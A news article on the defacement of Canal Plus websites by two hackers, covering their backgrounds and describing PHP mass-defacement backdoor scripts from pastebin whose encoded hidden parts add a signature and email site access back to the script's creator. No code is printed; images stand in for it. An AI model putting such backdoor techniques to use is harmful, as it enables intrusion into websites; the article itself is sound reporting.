Who are the hackers behind the defacement of Canal Plus?

On the evening of Monday March 14th, several of the Canal Plus group’s websites, including Canalplus.fr and Canalplay.com, were briefly defaced by the pirates AMAR^SHG and Moroccanwolf.

For several hours yesterday evening, visitors looking to access several of the Canal Plus group’s pages were surprised to see a different homepage than usual. Indeed, several of the group’s sites were defaced by pirates: in other words, the home page was replaced by a page created by the hackers.

The page in question denounced the “horrors committed” by certain countries “at war”: “The war against Israel, Kosovo and Serbia, Morocco and Western Sahara, Somalia, Russia, the United States”.
canalplus-deface

Who are the pirates?

The two pirates don’t seem to belong to the same group. AMAR^SHG claims to be Albanian and belongs to the Shkupi Hacker Group, while Moroccanwolf seems to be closer to Islamist movements, as witnessed by a search of websites pirated by the hacker and indexed by Google:
sites-pirates-moroccanwolf

The two pirates have a relatively active past, with several hundreds of sites defaced by Moroccanwolf, as we can see in the Zone-H website’s archives which lists all of these pages.
moroccanwolf-zoneh
amar-shg-zoneh

Infected scripts used by the pirates

During our research, we found various PHP scripts (used as backdoors) which were used to deface websites. The code of certain scripts was published two days ago on sharing websites like pastebin.com.
Below, an extract of a PHP script potentially used by the attackers for “mass defacement” and signed AMAR^SHG:
script-php-mass-defacement

These “pasting” websites are often used by pirates, notably to publish stolen data or lists of targets. The scripts can then be picked up by any amateur hacker looking to deface a website.
Which is good for the authors: certain scripts used by AMAR^SHG contain hidden features.

Below, a PHP variable called “kerupuk” called a second, encoded script that was also published on pastebin.com:
fonction-cachee

By decoding the second script, we were able to determine that certain instructions automatically insert the signature of the original backdoor creator – whose pseudonym is…Kerupuk.

The best part of the story is that this script, once we decoded it, contained other hidden instructions as shown in the following image. According to the code’s comments (“//untuk path folder”) it seems to be related to a folder path:
deuxieme-fonction-cachee

But if we decode this chain of characters, you can see that the variable automatically sends an email when the script is executed on a defaced website.
envoi-email

In summary, a hidden feature is used to give the script creator publicity, and a feature hidden further inside gives access to pirated websites, without the hacker who simply used the script knowing it.

AMAR^SHG’s scripts were published on March 13th, or the day before the Canal Plus defacing, which leads us to think that they were used for the attack.

That said, nothing proves that the hackers targeted the channel’s websites in particular.

Canal Plus pirated: collateral damage?

According to data published on Zone-H, no site the size of Canal Plus group seems to have previously been the victim of these hackers. The pirates do not seem to have a list of particular targets but attack any poorly-secured server.
In conclusion, the attack of which the Vivendi subsidiary was a victim could simply have been an opportunistic pirating of a server that hosts a large number of websites. The hackers could have pirated this server, launched a mass defacement script and hit Canal Plus without having targeted it in particular.

Suggestions